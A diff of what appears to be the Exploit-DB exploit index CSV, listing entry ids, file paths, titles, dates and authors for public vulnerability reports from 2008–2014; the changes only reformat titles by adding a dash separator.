32649,platforms/php/webapps/32649.txt,"PhPepperShop 1.4 - index.php URL XSS",2008-12-08,th3.r00k.ieatpork,php,webapps,0 32650,platforms/php/webapps/32650.txt,"PhPepperShop 1.4 shop/kontakt.php URL XSS",2008-12-08,th3.r00k.ieatpork,php,webapps,0 @@ -29432,7 +29432,7 @@ id,file,description,date,author,platform,type,port 32656,platforms/php/webapps/32656.txt,"Octeth Oempro 3.5.5 - Multiple SQL Injection",2008-12-01,"security curmudgeon",php,webapps,0 32657,platforms/windows/dos/32657.py,"Nokia N70 and N73 - Malformed OBEX Name Header Remote Denial of Service",2008-12-12,NCNIPC,windows,dos,0 32658,platforms/asp/webapps/32658.txt,"ASP-DEV XM Events Diary - 'cat' Parameter SQL Injection",2008-12-13,Pouya_Server,asp,webapps,0 -32763,platforms/windows/dos/32763.html,"Microsoft Internet Explorer 7.0 HTML Form Value Denial of Service",2009-01-28,"Juan Pablo Lopez Yacubian",windows,dos,0 +32763,platforms/windows/dos/32763.html,"Microsoft Internet Explorer 7.0 - HTML Form Value Denial of Service",2009-01-28,"Juan Pablo Lopez Yacubian",windows,dos,0 32660,platforms/asp/webapps/32660.txt,"CIS Manager CMS - SQL Injection",2014-04-02,"felipe andrian",asp,webapps,0 32661,platforms/windows/remote/32661.html,"Evans FTP - 'EvansFTP.ocx' ActiveX Control Multiple Remote Buffer Overflow Vulnerabilities",2008-12-14,Bl@ckbe@rD,windows,remote,0 32662,platforms/php/webapps/32662.py,"WebPhotoPro Multiple SQL Injection",2008-12-14,baltazar,php,webapps,0 @@ -29449,7 +29449,7 @@ id,file,description,date,author,platform,type,port 32673,platforms/multiple/remote/32673.java,"GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy Weakness (1)",2008-12-05,"Jack Lloyd",multiple,remote,0 32674,platforms/multiple/remote/32674.cpp,"GNU Classpath 0.97.2 - 'gnu.java.security.util.PRNG' Class Entropy Weakness (2)",2008-12-05,"Jack Lloyd",multiple,remote,0 32675,platforms/linux/dos/32675.py,"QEMU 0.9 and KVM 36/79 VNC Server Remote Denial of Service",2008-12-22,"Alfredo Ortega",linux,dos,0 -32676,platforms/php/webapps/32676.txt,"PECL Alternative PHP Cache Local 3 HTML Injection",2008-12-19,"Moritz Naumann",php,webapps,0 +32676,platforms/php/webapps/32676.txt,"PECL Alternative PHP Cache Local 3 - HTML Injection",2008-12-19,"Moritz Naumann",php,webapps,0 32677,platforms/jsp/webapps/32677.txt,"Openfire 3.6.2 - 'group-summary.jsp' Cross-Site Scripting",2009-01-08,"Federico Muttis",jsp,webapps,0 32678,platforms/jsp/webapps/32678.txt,"Openfire 3.6.2 - 'user-properties.jsp' Cross-Site Scripting",2009-01-08,"Federico Muttis",jsp,webapps,0 32679,platforms/jsp/webapps/32679.txt,"Openfire 3.6.2 - 'log.jsp' Cross-Site Scripting",2009-01-08,"Federico Muttis",jsp,webapps,0 @@ -29465,7 +29465,7 @@ id,file,description,date,author,platform,type,port 32689,platforms/php/webapps/32689.txt,"NPDS < 08.06 - Multiple Input Validation Vulnerabilities",2008-12-04,"Jean-François Leclerc",php,webapps,0 32690,platforms/linux/remote/32690.txt,"xterm DECRQSS Remote Command Execution",2008-12-29,"Paul Szabo",linux,remote,0 32691,platforms/linux/remote/32691.txt,"Audio File Library 0.2.6 - (libaudiofile) 'msadpcm.c' WAV File Processing Buffer Overflow",2008-12-30,"Anton Khirnov",linux,remote,0 -32692,platforms/hardware/dos/32692.txt,"Symbian S60 Malformed SMS/Mms Remote Denial Of Service",2008-12-30,"Tobias Engel",hardware,dos,0 +32692,platforms/hardware/dos/32692.txt,"Symbian S60 - Malformed SMS/Mms Remote Denial Of Service",2008-12-30,"Tobias Engel",hardware,dos,0 32693,platforms/php/local/32693.php,"suPHP 0.7 - 'suPHP_ConfigPath' Safe Mode Restriction-Bypass",2008-12-31,Mr.SaFa7,php,local,0 32694,platforms/osx/dos/32694.pl,"Apple Safari 3.2 WebKit 'alink' Property Memory Leak Remote Denial of Service (1)",2009-01-01,"Jeremy Brown",osx,dos,0 32695,platforms/osx/dos/32695.php,"Apple Safari 3.2 WebKit 'alink' Property Memory Leak Remote Denial of Service (2)",2009-01-01,Pr0T3cT10n,osx,dos,0 @@ -29480,15 +29480,15 @@ id,file,description,date,author,platform,type,port 32704,platforms/windows/dos/32704.pl,"MA Lighting Technology grandMA onPC 6.808 - Remote Denial of Service (DOS)",2014-04-05,LiquidWorm,windows,dos,0 32706,platforms/windows/dos/32706.txt,"Notepad++ DSpellCheck 1.2.12.0 - Denial of Service",2014-04-06,sajith,windows,dos,0 32707,platforms/windows/dos/32707.txt,"InfraRecorder 0.53 - Memory Corruption [Denial of Service]",2014-04-06,sajith,windows,dos,0 -32708,platforms/jsp/webapps/32708.txt,"Plunet BusinessManager 4.1 pagesUTF8/auftrag_allgemeinauftrag.jsp Multiple Parameter XSS",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0 -32709,platforms/jsp/webapps/32709.txt,"Plunet BusinessManager 4.1 pagesUTF8/Sys_DirAnzeige.jsp Pfad Parameter Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0 -32710,platforms/jsp/webapps/32710.txt,"Plunet BusinessManager 4.1 pagesUTF8/auftrag_job.jsp Pfad Parameter Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0 -32711,platforms/windows/remote/32711.txt,"Multiple CA Service Management Products Unspecified Remote Command Execution",2009-01-07,"Michel Arboi",windows,remote,0 +32708,platforms/jsp/webapps/32708.txt,"Plunet BusinessManager 4.1 - pagesUTF8/auftrag_allgemeinauftrag.jsp Multiple Parameter XSS",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0 +32709,platforms/jsp/webapps/32709.txt,"Plunet BusinessManager 4.1 - pagesUTF8/Sys_DirAnzeige.jsp Pfad Parameter Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0 +32710,platforms/jsp/webapps/32710.txt,"Plunet BusinessManager 4.1 - pagesUTF8/auftrag_job.jsp Pfad Parameter Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0 +32711,platforms/windows/remote/32711.txt,"Multiple CA Service Management Products - Unspecified Remote Command Execution",2009-01-07,"Michel Arboi",windows,remote,0 32712,platforms/multiple/dos/32712.txt,"IBM WebSphere DataPower XML Security Gateway 3.6.1 XS40 - Remote Denial Of Service",2009-01-08,Erik,multiple,dos,0 32713,platforms/php/webapps/32713.txt,"tadbook2 Module for XOOPS - 'open_book.php' SQL Injection",2009-01-07,stylextra,php,webapps,0 32714,platforms/php/webapps/32714.txt,"Visuplay CMS - Multiple SQL Injection",2009-01-12,"Joseph Giron",php,webapps,0 32715,platforms/php/dos/32715.php,"PHP 5.2.8 - 'popen()' Function Buffer Overflow",2009-01-12,e.wiZz!,php,dos,0 -32716,platforms/asp/webapps/32716.html,"Comersus Cart 6 User Email and User Password Unauthorized Access",2009-01-12,ajann,asp,webapps,0 +32716,platforms/asp/webapps/32716.html,"Comersus Cart 6 - User Email and User Password Unauthorized Access",2009-01-12,ajann,asp,webapps,0 32718,platforms/php/webapps/32718.txt,"Ovidentia 6.7.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-01-12,"Ivan Sanchez",php,webapps,0 32721,platforms/php/webapps/32721.txt,"XAMPP 3.2.1 & phpMyAdmin 4.1.6 - Multiple Vulnerabilities",2014-04-07,hackerDesk,php,webapps,0 32723,platforms/hardware/remote/32723.txt,"Cisco IOS 12.x - HTTP Server Multiple Cross-Site Scripting Vulnerabilities",2009-01-14,"Adrian Pastor",hardware,remote,0 @@ -29498,11 +29498,11 @@ id,file,description,date,author,platform,type,port 32727,platforms/php/webapps/32727.txt,"MKPortal 1.2.1 - /modules/blog/index.php Home Template Textarea SQL Injection",2009-01-15,waraxe,php,webapps,0 32728,platforms/php/webapps/32728.txt,"MKPortal 1.2.1 - /modules/rss/handler_image.php i Parameter XSS",2009-01-15,waraxe,php,webapps,0 32729,platforms/asp/webapps/32729.txt,"LinksPro - 'OrderDirection' Parameter SQL Injection",2009-01-15,Pouya_Server,asp,webapps,0 -32730,platforms/asp/webapps/32730.txt,"Active Bids search.asp search Parameter XSS",2009-01-15,Pouya_Server,asp,webapps,0 -32731,platforms/asp/webapps/32731.txt,"Active Bids search.asp search Parameter SQL Injection",2009-01-15,Pouya_Server,asp,webapps,0 +32730,platforms/asp/webapps/32730.txt,"Active Bids - search.asp search Parameter XSS",2009-01-15,Pouya_Server,asp,webapps,0 +32731,platforms/asp/webapps/32731.txt,"Active Bids - search.asp search Parameter SQL Injection",2009-01-15,Pouya_Server,asp,webapps,0 32732,platforms/php/webapps/32732.txt,"Masir Camp 3.0 - 'SearchKeywords' Parameter SQL Injection",2009-01-15,Pouya_Server,php,webapps,0 32733,platforms/php/webapps/32733.txt,"w3bcms - 'admin/index.php' SQL Injection",2009-01-15,Pouya_Server,php,webapps,0 -32734,platforms/cgi/webapps/32734.txt,"LemonLDAP:NG 0.9.3.1 User Enumeration Weakness and Cross-Site Scripting",2009-01-16,"clément Oudot",cgi,webapps,0 +32734,platforms/cgi/webapps/32734.txt,"LemonLDAP:NG 0.9.3.1 - User Enumeration Weakness and Cross-Site Scripting",2009-01-16,"clément Oudot",cgi,webapps,0 32735,platforms/asp/webapps/32735.txt,"Blog Manager inc_webblogmanager.asp ItemID Parameter SQL Injection",2009-01-16,Pouya_Server,asp,webapps,0 32736,platforms/asp/webapps/32736.txt,"Blog Manager inc_webblogmanager.asp CategoryID Parameter XSS",2009-01-16,Pouya_Server,asp,webapps,0 32737,platforms/windows/local/32737.pl,"BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow Jump ESP",2014-04-08,"Deepak Rathore",windows,local,0 @@ -29527,8 +29527,8 @@ id,file,description,date,author,platform,type,port 32758,platforms/asp/webapps/32758.txt,"Lootan - 'login.asp' SQL Injection",2009-01-26,"Arash Setayeshi",asp,webapps,0 32759,platforms/php/webapps/32759.txt,"OpenX 2.6.2 - 'MAX_type' Parameter Local File Inclusion",2009-01-26,"Sarid Harper",php,webapps,0 32760,platforms/php/webapps/32760.txt,"NewsCMSLite Insecure Cookie Authentication Bypass",2009-01-24,FarhadKey,php,webapps,0 -32761,platforms/windows/dos/32761.pl,"Apple Safari For Windows 3.2.1 Malformed URI Remote Denial Of Service",2009-01-27,Lostmon,windows,dos,0 -32762,platforms/multiple/remote/32762.pl,"Sun Java System Access Manager 7.1 Username Enumeration Weakness",2009-01-27,"Marco Mella",multiple,remote,0 +32761,platforms/windows/dos/32761.pl,"Apple Safari For Windows 3.2.1 - Malformed URI Remote Denial Of Service",2009-01-27,Lostmon,windows,dos,0 +32762,platforms/multiple/remote/32762.pl,"Sun Java System Access Manager 7.1 - Username Enumeration Weakness",2009-01-27,"Marco Mella",multiple,remote,0 32764,platforms/multiple/remote/32764.py,"OpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure (Multiple SSL/TLS versions)",2014-04-09,"Fitzl Csaba",multiple,remote,443 32765,platforms/multiple/webapps/32765.txt,"csUpload Script Site - Authentication Bypass",2014-04-09,Satanic2000,multiple,webapps,0 32766,platforms/php/webapps/32766.txt,"Autonomy Ultraseek - 'cs.html' URI Redirection",2009-01-28,buzzy,php,webapps,0 @@ -29539,10 +29539,10 @@ id,file,description,date,author,platform,type,port 32771,platforms/windows/local/32771.txt,"Multiple Kaspersky Products 'klim5.sys' - Local Privilege Escalation",2009-02-02,"Ruben Santamarta ",windows,local,0 32772,platforms/windows/dos/32772.py,"Nokia Multimedia Player 1.1 - (.m3u) Heap Buffer Overflow",2009-02-03,zer0in,windows,dos,0 32773,platforms/php/webapps/32773.txt,"Simple Machines Forum 1.1.7 - '[url]' Tag HTML Injection",2009-02-03,Xianur0,php,webapps,0 -32774,platforms/multiple/dos/32774.txt,"QIP 2005 Malformed Rich Text Message Remote Denial of Service",2009-02-04,ShineShadow,multiple,dos,0 +32774,platforms/multiple/dos/32774.txt,"QIP 2005 - Malformed Rich Text Message Remote Denial of Service",2009-02-04,ShineShadow,multiple,dos,0 32775,platforms/linux/dos/32775.txt,"Linux Kernel 2.6.x - 'make_indexed_dir()' Local Denial of Service",2009-02-16,"Sami Liedes",linux,dos,0 32776,platforms/hardware/remote/32776.txt,"Cisco IOS 12.4(23) HTTP Server Multiple Cross-Site Scripting Vulnerabilities",2009-02-04,Zloss,hardware,remote,0 -32777,platforms/php/webapps/32777.html,"MetaBBS 0.11 Administration Settings Authentication Bypass",2009-02-04,make0day,php,webapps,0 +32777,platforms/php/webapps/32777.html,"MetaBBS 0.11 - Administration Settings Authentication Bypass",2009-02-04,make0day,php,webapps,0 32778,platforms/windows/local/32778.pl,"Password Door 8.4 - Local Buffer Overflow",2009-02-05,b3hz4d,windows,local,0 32779,platforms/php/webapps/32779.txt,"Ilch CMS 1.1 - 'HTTP_X_FORWARDED_FOR' SQL Injection",2009-02-06,Gizmore,php,webapps,0 32780,platforms/linux/remote/32780.py,"PyCrypto ARC2 Module Buffer Overflow",2009-02-07,"Mike Wiacek",linux,remote,0 @@ -29574,12 +29574,12 @@ id,file,description,date,author,platform,type,port 32807,platforms/php/webapps/32807.txt,"Joomla! and Mambo gigCalendar Component 1.0 - 'banddetails.php' SQL Injection",2009-02-23,"Salvatore Fresta",php,webapps,0 32808,platforms/php/webapps/32808.txt,"Magento 1.2 - app/code/core/Mage/Admin/Model/Session.php login[username] Parameter XSS",2009-02-24,"Loukas Kalenderidis",php,webapps,0 32809,platforms/php/webapps/32809.txt,"Magento 1.2 app/code/core/Mage/Adminhtml/controllers/IndexController.php email Parameter XSS",2009-02-24,"Loukas Kalenderidis",php,webapps,0 -32810,platforms/php/webapps/32810.txt,"Magento 1.2 downloader/index.php URL XSS",2009-02-24,"Loukas Kalenderidis",php,webapps,0 +32810,platforms/php/webapps/32810.txt,"Magento 1.2 - downloader/index.php URL XSS",2009-02-24,"Loukas Kalenderidis",php,webapps,0 32811,platforms/unix/remote/32811.txt,"Adobe Flash Player 9/10 - Invalid Object Reference Remote Code Execution",2009-02-24,"Javier Vicente Vallejo",unix,remote,0 32814,platforms/php/webapps/32814.txt,"Sendy 1.1.9.1 - SQL Injection",2014-04-11,delme,php,webapps,0 32815,platforms/linux/dos/32815.c,"Linux Kernel 2.6.x - Cloned Process 'CLONE_PARENT' Local Origin Validation Weakness",2009-02-25,"Chris Evans",linux,dos,0 32816,platforms/php/webapps/32816.txt,"Orooj CMS - 'news.php' SQL Injection",2009-02-25,Cru3l.b0y,php,webapps,0 -32817,platforms/osx/dos/32817.txt,"Apple Safari 4 Malformed 'feeds:' URI Null Pointer Dereference Remote Denial Of Service",2009-02-25,Trancer,osx,dos,0 +32817,platforms/osx/dos/32817.txt,"Apple Safari 4 - Malformed 'feeds:' URI Null Pointer Dereference Remote Denial Of Service",2009-02-25,Trancer,osx,dos,0 32818,platforms/java/webapps/32818.txt,"JOnAS 4.10.3 - 'select' Parameter Error Page Cross-Site Scripting",2009-02-25,"Digital Security Research Group",java,webapps,0 32819,platforms/php/webapps/32819.txt,"Parsi PHP CMS 2.0 - 'index.php' SQL Injection",2009-02-26,Cru3l.b0y,php,webapps,0 32820,platforms/linux/local/32820.txt,"OpenSC 0.11.x - PKCS#11 Implementation Unauthorized Access",2009-02-26,"Andreas Jellinghaus",linux,local,0 @@ -29602,7 +29602,7 @@ id,file,description,date,author,platform,type,port 32836,platforms/multiple/dos/32836.html,"Mozilla Firefox 2.0.x - Nested 'window.print()' Denial of Service",2009-03-03,b3hz4d,multiple,dos,0 32837,platforms/linux/remote/32837.py,"Wesnoth 1.x - PythonAI Remote Code Execution",2009-02-25,Wesnoth,linux,remote,0 32838,platforms/linux/dos/32838.txt,"MySQL 6.0.9 XPath Expression Remote Denial Of Service",2009-02-14,"Shane Bester",linux,dos,0 -32839,platforms/multiple/remote/32839.txt,"IBM WebSphere Application Server 6.1/7.0 Administrative Console Cross-Site Scripting",2009-02-26,IBM,multiple,remote,0 +32839,platforms/multiple/remote/32839.txt,"IBM WebSphere Application Server 6.1/7.0 - Administrative Console Cross-Site Scripting",2009-02-26,IBM,multiple,remote,0 32840,platforms/php/webapps/32840.txt,"Amoot Web Directory - Password Field SQL Injection",2009-03-05,Pouya_Server,php,webapps,0 32841,platforms/php/webapps/32841.txt,"CMSCart 1.04 - 'maindatafunctions.php' SQL Injection",2009-02-28,"John Martinelli",php,webapps,0 32842,platforms/php/webapps/32842.txt,"UMI CMS 2.7 - 'fields_filter' Parameter Cross-Site Scripting",2009-03-06,"Dmitriy Evteev",php,webapps,0 @@ -29644,7 +29644,7 @@ id,file,description,date,author,platform,type,port 32878,platforms/hardware/remote/32878.txt,"Cisco ASA Appliance 7.x/8.0 WebVPN Cross-Site Scripting",2009-03-31,"Bugs NotHugs",hardware,remote,0 32879,platforms/windows/remote/32879.html,"SAP MaxDB 7.4/7.6 - 'webdbm' Multiple Cross-Site Scripting Vulnerabilities",2009-03-31,"Digital Security Research Group",windows,remote,0 32880,platforms/php/webapps/32880.txt,"Turnkey eBook Store 1.1 - 'keywords' Parameter Cross-Site Scripting",2009-03-31,TEAMELITE,php,webapps,0 -32881,platforms/windows/dos/32881.py,"QtWeb Browser 2.0 Malformed HTML File Remote Denial of Service",2009-04-01,LiquidWorm,windows,dos,0 +32881,platforms/windows/dos/32881.py,"QtWeb Browser 2.0 - Malformed HTML File Remote Denial of Service",2009-04-01,LiquidWorm,windows,dos,0 32882,platforms/asp/webapps/32882.txt,"SAP Business Objects Crystal Reports 7-10 - 'viewreport.asp' Cross-Site Scripting",2009-04-02,"Bugs NotHugs",asp,webapps,0 32883,platforms/hardware/webapps/32883.txt,"NETGEAR N600 WIRELESS DUAL BAND WNDR3400 - Multiple Vulnerabilities",2014-04-15,"Santhosh Kumar",hardware,webapps,8080 32884,platforms/android/local/32884.txt,"Adobe Reader for Android 11.1.3 - Arbitrary JavaScript Execution",2014-04-15,"Yorick Koster",android,local,0 @@ -29668,10 +29668,10 @@ id,file,description,date,author,platform,type,port 32906,platforms/php/webapps/32906.txt,"LinPHA 1.3.2/1.3.3 new_images.php XSS",2009-04-09,"Gerendi Sandor Attila",php,webapps,0 32907,platforms/cgi/webapps/32907.txt,"Banshee 1.4.2 DAAP Extension - 'apps/web/vs_diag.cgi' Cross-Site Scripting",2009-04-13,"Anthony de Almeida Lopes",cgi,webapps,0 32908,platforms/multiple/webapps/32908.txt,"IBM Tivoli Continuous Data Protection for Files 3.1.4.0 - Cross-Site Scripting",2009-04-14,"Abdul-Aziz Hariri",multiple,webapps,0 -32909,platforms/java/webapps/32909.txt,"Novell Teaming 1.0 User Enumeration Weakness and Multiple Cross-Site Scripting Vulnerabilities",2009-04-15,"Michael Kirchner",java,webapps,0 -32910,platforms/php/webapps/32910.txt,"Phorum 5.2 admin/badwords.php curr Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0 -32911,platforms/php/webapps/32911.txt,"Phorum 5.2 admin/banlist.php curr Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0 -32912,platforms/php/webapps/32912.txt,"Phorum 5.2 admin/users.php Multiple Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0 +32909,platforms/java/webapps/32909.txt,"Novell Teaming 1.0 - User Enumeration Weakness and Multiple Cross-Site Scripting Vulnerabilities",2009-04-15,"Michael Kirchner",java,webapps,0 +32910,platforms/php/webapps/32910.txt,"Phorum 5.2 - admin/badwords.php curr Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0 +32911,platforms/php/webapps/32911.txt,"Phorum 5.2 - admin/banlist.php curr Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0 +32912,platforms/php/webapps/32912.txt,"Phorum 5.2 - admin/users.php Multiple Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0 32913,platforms/php/webapps/32913.txt,"Phorum 5.2 - versioncheck.php upgrade_available Parameter XSS",2009-04-16,voodoo-labs,php,webapps,0 32914,platforms/php/webapps/32914.php,"Geeklog 1.5.2 - 'usersettings.php' SQL Injection",2009-04-16,Nine:Situations:Group::bookoo,php,webapps,0 32998,platforms/multiple/remote/32998.c,"Heartbleed OpenSSL - Information Leak Exploit (2) DTLS Support",2014-04-24,"Ayman Sagy",multiple,remote,0 @@ -29692,7 +29692,7 @@ id,file,description,date,author,platform,type,port 32932,platforms/php/webapps/32932.txt,"Online Photo Pro 2.0 - 'section' Parameter Cross-Site Scripting",2009-04-20,Vrs-hCk,php,webapps,0 32933,platforms/php/webapps/32933.txt,"Online Contact Manager 3.0 - index.php showGroup Parameter XSS",2009-04-20,Vrs-hCk,php,webapps,0 32934,platforms/php/webapps/32934.txt,"Online Contact Manager 3.0 view.php id Parameter XSS",2009-04-20,Vrs-hCk,php,webapps,0 -32935,platforms/php/webapps/32935.txt,"Online Contact Manager 3.0 email.php id Parameter XSS",2009-04-20,Vrs-hCk,php,webapps,0 +32935,platforms/php/webapps/32935.txt,"Online Contact Manager 3.0 - email.php id Parameter XSS",2009-04-20,Vrs-hCk,php,webapps,0 32936,platforms/php/webapps/32936.txt,"Online Contact Manager 3.0 edit.php id Parameter XSS",2009-04-20,Vrs-hCk,php,webapps,0 32937,platforms/php/webapps/32937.txt,"Online Contact Manager 3.0 delete.php id Parameter XSS",2009-04-20,Vrs-hCk,php,webapps,0 32938,platforms/hardware/remote/32938.c,"Sercomm TCP/32674 Backdoor Reactivation",2014-04-18,Synacktiv,hardware,remote,32674 @@ -29716,7 +29716,7 @@ id,file,description,date,author,platform,type,port 32956,platforms/windows/dos/32956.py,"RealNetworks RealPlayer Gold 10.0 MP3 - File Handling Remote Denial of Service",2009-04-27,"Abdul-Aziz Hariri",windows,dos,0 32957,platforms/windows/remote/32957.txt,"DWebPro 6.8.26 - Directory Traversal / Arbitrary File Disclosure",2009-04-27,"Alfons Luja",windows,remote,0 32958,platforms/php/webapps/32958.txt,"MataChat - 'input.php' Multiple Cross-Site Scripting Vulnerabilities",2009-04-27,Am!r,php,webapps,0 -32959,platforms/windows/remote/32959.rb,"Adobe Flash Player Regular Expression Heap Overflow",2014-04-21,Metasploit,windows,remote,0 +32959,platforms/windows/remote/32959.rb,"Adobe Flash Player - Regular Expression Heap Overflow",2014-04-21,Metasploit,windows,remote,0 33337,platforms/osx/dos/33337.c,"Apple Mac OS X 10.5.x - 'ptrace' Mutex Handling Local Denial of Service",2009-11-04,"Micheal Turner",osx,dos,0 32960,platforms/php/webapps/32960.txt,"Invision Power Board 3.0 - Multiple HTML-Injection and Information Disclosure Vulnerabilities",2009-04-27,brain[pillow],php,webapps,0 32961,platforms/linux/dos/32961.html,"Mozilla Firefox 3.0.9 - 'nsTextFrame::ClearTextRun()' Remote Memory Corruption",2009-04-27,"Marc Gueury",linux,dos,0 @@ -29729,23 +29729,23 @@ id,file,description,date,author,platform,type,port 32968,platforms/php/webapps/32968.sh,"IceWarp Merak Mail Server 9.4.1 Groupware Component Multiple SQL Injection",2009-05-05,"RedTeam Pentesting",php,webapps,0 32969,platforms/php/webapps/32969.txt,"IceWarp Merak Mail Server 9.4.1 - 'cleanHTML()' Function Cross-Site Scripting",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0 33077,platforms/linux/dos/33077.c,"MySQL 5.0.75 - 'sql_parse.cc' Multiple Format String Vulnerabilities",2009-06-08,kingcope,linux,dos,0 -32971,platforms/multiple/remote/32971.txt,"Glassfish Enterprise Server 2.1 Admin Console /applications/applications.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0 +32971,platforms/multiple/remote/32971.txt,"Glassfish Enterprise Server 2.1 - Admin Console /applications/applications.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0 33577,platforms/multiple/remote/33577.txt,"XAMPP 1.6.x - Multiple Cross-Site Scripting Vulnerabilities",2009-06-10,MustLive,multiple,remote,0 33352,platforms/windows/remote/33352.py,"Easy File Sharing Web Server 6.8 - Stack Buffer Overflow",2014-05-14,superkojiman,windows,remote,80 32973,platforms/hardware/webapps/32973.txt,"Sixnet Sixview 2.4.1 - Web Console Directory Traversal",2014-04-22,"daniel svartman",hardware,webapps,0 -32978,platforms/multiple/remote/32978.txt,"Glassfish Enterprise Server 2.1 Admin Console /sysnet/registration.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0 -32974,platforms/multiple/remote/32974.txt,"Glassfish Enterprise Server 2.1 Admin Console /configuration/configuration.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0 -32975,platforms/multiple/remote/32975.txt,"Glassfish Enterprise Server 2.1 Admin Console /customMBeans/customMBeans.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0 +32978,platforms/multiple/remote/32978.txt,"Glassfish Enterprise Server 2.1 - Admin Console /sysnet/registration.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0 +32974,platforms/multiple/remote/32974.txt,"Glassfish Enterprise Server 2.1 - Admin Console /configuration/configuration.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0 +32975,platforms/multiple/remote/32975.txt,"Glassfish Enterprise Server 2.1 - Admin Console /customMBeans/customMBeans.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0 32976,platforms/php/webapps/32976.php,"No-CMS 0.6.6 rev 1 - Admin Account Hijacking / RCE Exploit via Static Encryption Key",2014-04-22,"Mehmet Ince",php,webapps,0 -32977,platforms/multiple/remote/32977.txt,"Glassfish Enterprise Server 2.1 Admin Console /resourceNode/resources.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0 -32979,platforms/multiple/remote/32979.txt,"Glassfish Enterprise Server 2.1 Admin Console /webService/webServicesGeneral.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0 -32980,platforms/multiple/remote/32980.txt,"Glassfish Enterprise Server 2.1 Admin Console /configuration/auditModuleEdit.jsf name Parameter XSS",2009-05-05,DSecRG,multiple,remote,0 -32981,platforms/multiple/remote/32981.txt,"Glassfish Enterprise Server 2.1 Admin Console /resourceNode/jdbcResourceEdit.jsf name Parameter XSS",2009-05-05,DSecRG,multiple,remote,0 +32977,platforms/multiple/remote/32977.txt,"Glassfish Enterprise Server 2.1 - Admin Console /resourceNode/resources.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0 +32979,platforms/multiple/remote/32979.txt,"Glassfish Enterprise Server 2.1 - Admin Console /webService/webServicesGeneral.jsf URI XSS",2009-05-05,DSecRG,multiple,remote,0 +32980,platforms/multiple/remote/32980.txt,"Glassfish Enterprise Server 2.1 - Admin Console /configuration/auditModuleEdit.jsf name Parameter XSS",2009-05-05,DSecRG,multiple,remote,0 +32981,platforms/multiple/remote/32981.txt,"Glassfish Enterprise Server 2.1 - Admin Console /resourceNode/jdbcResourceEdit.jsf name Parameter XSS",2009-05-05,DSecRG,multiple,remote,0 34148,platforms/multiple/webapps/34148.txt,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent",2014-07-23,Vulnerability-Lab,multiple,webapps,0 -32983,platforms/php/webapps/32983.txt,"kitForm CRM Extension 0.43 (sorter.php sorter_value param) - SQL Injection",2014-04-22,chapp,php,webapps,80 +32983,platforms/php/webapps/32983.txt,"kitForm CRM Extension 0.43 - (sorter.php sorter_value param) SQL Injection",2014-04-22,chapp,php,webapps,80 32985,platforms/php/webapps/32985.xml,"IceWarp Merak Mail Server 9.4.1 - 'item.php' Cross-Site Scripting",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0 32986,platforms/php/webapps/32986.py,"IceWarp Merak Mail Server 9.4.1 - 'Forgot Password' Input Validation",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0 -32987,platforms/multiple/remote/32987.txt,"Woodstock 4.2 404 Error Page Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote,0 +32987,platforms/multiple/remote/32987.txt,"Woodstock 4.2 404 - Error Page Cross-Site Scripting",2009-05-05,DSecRG,multiple,remote,0 32988,platforms/php/webapps/32988.txt,"VerliAdmin 0.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-05-05,TEAMELITE,php,webapps,0 32989,platforms/php/webapps/32989.txt,"Verlihub Control Panel 1.7 - Multiple Cross-Site Scripting Vulnerabilities",2009-05-06,TEAMELITE,php,webapps,0 32990,platforms/hardware/webapps/32990.pl,"HP Laser Jet - JavaScript Persistent XSS via PJL Directory Traversal",2014-04-23,@0x00string,hardware,webapps,0 @@ -29761,7 +29761,7 @@ id,file,description,date,author,platform,type,port 33001,platforms/php/webapps/33001.ssh,"Kingsoft Webshield 1.1.0.62 - Cross-Site scripting / Remote Command Execution",2009-05-20,inking,php,webapps,0 33002,platforms/php/webapps/33002.txt,"Profense 2.2.20/2.4.2 Web Application Firewall Security Bypass",2009-05-20,EnableSecurity,php,webapps,0 33003,platforms/php/webapps/33003.txt,"WordPress Work-The-Flow Plugin 1.2.1 - Arbitrary File Upload",2014-04-24,nopesled,php,webapps,80 -33004,platforms/php/webapps/33004.txt,"dompdf 0.6.0 (dompdf.php read param) - Arbitrary File Read",2014-04-24,Portcullis,php,webapps,80 +33004,platforms/php/webapps/33004.txt,"dompdf 0.6.0 - (dompdf.php read param) Arbitrary File Read",2014-04-24,Portcullis,php,webapps,80 33005,platforms/php/webapps/33005.txt,"WD Arkeia Virtual Appliance 10.2.9 - Local File Inclusion",2014-04-24,"SEC Consult",php,webapps,80 33006,platforms/php/webapps/33006.txt,"AlienVault 4.3.1 - Unauthenticated SQL Injection",2014-04-24,"Sasha Zivojinovic",php,webapps,443 33007,platforms/multiple/remote/33007.txt,"Novell GroupWise 8.0 WebAccess Multiple Security Vulnerabilities",2009-05-21,"Gregory Duchemin",multiple,remote,0 @@ -29780,7 +29780,7 @@ 